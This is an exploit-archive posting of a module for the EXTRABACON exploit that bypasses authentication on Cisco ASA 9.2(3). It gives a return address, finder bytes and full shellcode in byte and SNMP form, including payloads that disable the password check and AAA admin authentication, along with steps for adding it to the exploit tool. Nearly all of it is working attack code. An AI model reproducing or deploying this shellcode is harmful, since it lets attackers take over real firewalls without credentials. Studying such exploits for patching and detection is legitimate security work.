Cisco ASA 9.2(3) EXTRABACON Module / Authentication Bypass
Posted on 16 September 2016
# # Cisco ASA 9.2(3) Authentication Bypass (EXTRABACON Module) # # Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com) # License: http://opensource.org/licenses/MIT # Release Date: September 15, 2016 # # Authors: # Sean Dillon (2E3C8D72353C9B8C9FF797E753EC4C9876D5727B) # Zachary Harding (14C0AA3670E9501ADDFC0176298CD7A969BAA8A1) # # Description: # Additional EXTRABACON module for Cisco ASA version 9.2(3). # This does not use the same shellcode as the Equation Group version, # but accomplishes the same task of disabling the auth functions # in less stages/bytes. # # Build/Run: # 1) Save this file to versions/shellcode_asa923.py # 2) Add the version string to fw_version_check() # 3) Shellcode is for --pass-disable # vers = "asa923" # there is a jmp esp @ 08 1d 70 1d # 81d701c: e8 ff e4 ff ff call 81d5520 <_ctm_hw_free@@Base+0x50fd0> my_ret_addr_len = 4 my_ret_addr_byte = "x1dx70x1dx08" my_ret_addr_snmp = "29.112.29.8" finder_len = 9 finder_byte = "x8bx7cx24x14x8bx07xffxe0x90" finder_snmp = "139.124.36.20.139.7.255.224.144" # ROPgadget --binary lina_92-3 --opcode 897dfc8b1685d2 # 0x9b78010 = function # 0x9b78000 = byte boundary # 0x8085a40 # 0x8085000 # preamble has a stack clean up and offset to where we first hijacked execution # 0x9277386 preamble_len = 69 preamble_byte = "x31xc0x31xdbx31xf6x31xc9x60x80xc5x10x80xc2x07x04x7dx50xbbx00x80xb7x09xcdx80x58xbbx00x50x08x08xcdx80x68x31xc0x40xc3x58xa3x10x80xb7x09xa3x40x5ax08x08x61x68x86x73x27x09x80xc3x10xbfx0bx0fx0fx0fx89xe5x83xc5x48xc3" preamble_snmp = "49.192.49.219.49.246.49.201.96.128.197.16.128.194.7.4.125.80.187.0.128.183.9.205.128.88.187.0.80.8.8.205.128.104.49.192.64.195.88.163.16.128.183.9.163.64.90.8.8.97.104.134.115.39.9.128.195.16.191.11.15.15.15.137.229.131.197.72.195" postscript_len = 2 postscript_byte = "x61xc3" postscript_snmp = "97.195" launcher_len = 6 launcher_snmp = "144.144.144.144.144.144" launcher_byte = "x90x90x90x90x90x90" payload_nop_len = 116 payload_nop_byte = "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90xb8x1dx80xbex09x50xb8x05x60xa3xadx35xa5xa5xa5xa5xffxd0x58xc3" payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.29.128.190.9.80.184.5.96.163.173.53.165.165.165.165.255.208.88.195" payload_PMCHECK_DISABLE_len = 70 payload_PMCHECK_DISABLE_byte = "x7ax30x78x30xbfxa5xa5xa5xa5xb8xd8xa5xa5xa5x31xf8xbbxa5x25x12xacx31xfbxb9xa5xb5xa5xa5x31xf9xbaxa2xa5xa5xa5x31xfaxcdx80xebx14xbfx10x80xb7x09x31xc9xb1x04xfcxf3xa4xe9x0cx00x00x00x5exebxecxe8xf8xffxffxffx31xc0x40xc3" payload_PMCHECK_DISABLE_snmp = "122.48.120.48.191.165.165.165.165.184.216.165.165.165.49.248.187.165.37.18.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.16.128.183.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" payload_AAAADMINAUTH_DISABLE_len = 66 payload_AAAADMINAUTH_DISABLE_byte = "xbfxa5xa5xa5xa5xb8xd8xa5xa5xa5x31xf8xbbxa5xf5xadxadx31xfbxb9xa5xb5xa5xa5x31xf9xbaxa2xa5xa5xa5x31xfaxcdx80xebx14xbfx40x5ax08x08x31xc9xb1x04xfcxf3xa4xe9x0cx00x00x00x5exebxecxe8xf8xffxffxffx31xc0x40xc3" payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.245.173.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.64.90.8.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"